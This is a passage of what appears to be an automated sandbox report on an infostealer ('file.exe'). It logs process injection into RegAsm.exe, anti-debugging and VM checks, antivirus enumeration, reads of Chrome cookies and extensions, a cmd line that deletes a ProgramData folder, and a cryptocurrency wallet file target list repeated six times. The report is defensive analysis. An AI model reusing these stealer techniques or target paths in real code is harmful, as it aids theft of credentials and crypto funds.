                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                  Source: RegAsm.exe, 00000001.00000002.2107667144.0000000000EF5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware?
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FA3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2107817674.0000000000F68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: RegAsm.exe, 00000001.00000002.2107667144.0000000000EF5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                  Source: RegAsm.exe, 00000001.00000002.2107817674.00000000010A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_1-79927
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_1-78719
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A0B916 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A0B916
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041608F GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_0041608F
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A0F2BC mov ecx, dword ptr fs:[00000030h]0_2_00A0F2BC
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A184AC mov eax, dword ptr fs:[00000030h]0_2_00A184AC
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A400D3 mov eax, dword ptr fs:[00000030h]0_2_00A400D3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00415CD3 mov eax, dword ptr fs:[00000030h]1_2_00415CD3
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A1AAAB GetProcessHeap,0_2_00A1AAAB
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A070C5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00A070C5
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A0B916 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A0B916
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A06E56 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A06E56
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A06FB2 SetUnhandledExceptionFilter,0_2_00A06FB2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00419387 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00419387
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00417E5F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00417E5F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041CF18 SetUnhandledExceptionFilter,1_2_0041CF18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19822C8E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_19822C8E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_198242AF SetUnhandledExceptionFilter,1_2_198242AF

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040FC40 _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,1_2_0040FC40
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 420000Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42B000Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63E000Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A3C008Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KFBFCAFCBKFI" & exitJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A2B400 cpuid 0_2_00A2B400
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_00A1A0E0
                  Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_00A1A187
                  Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_00A1A1D2
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00A1A2F8
                  Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_00A1A26D
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_00A1A54B
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00A1A674
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_00A1A77A
                  Source: C:\Users\user\Desktop\file.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00A1A849
                  Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_00A11AC2
                  Source: C:\Users\user\Desktop\file.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00A19EE5
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_00A11FE8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _EH_prolog,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_0040E76B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,1_2_19822112
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,1_2_19822112
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,1_2_199FFF17
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_19A13300
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,1_2_19823AA3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,1_2_19A12DF9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,1_2_19A12D38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,1_2_19A12CB6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A06D50 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00A06D50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040E651 GetProcessHeap,HeapAlloc,GetUserNameA,1_2_0040E651
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040E718 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,1_2_0040E718
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000F68000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2107817674.0000000000F85000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: 0.2.file.exe.a2b000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.a2b000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.a00000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 7420, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7440, type: MEMORYSTR
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
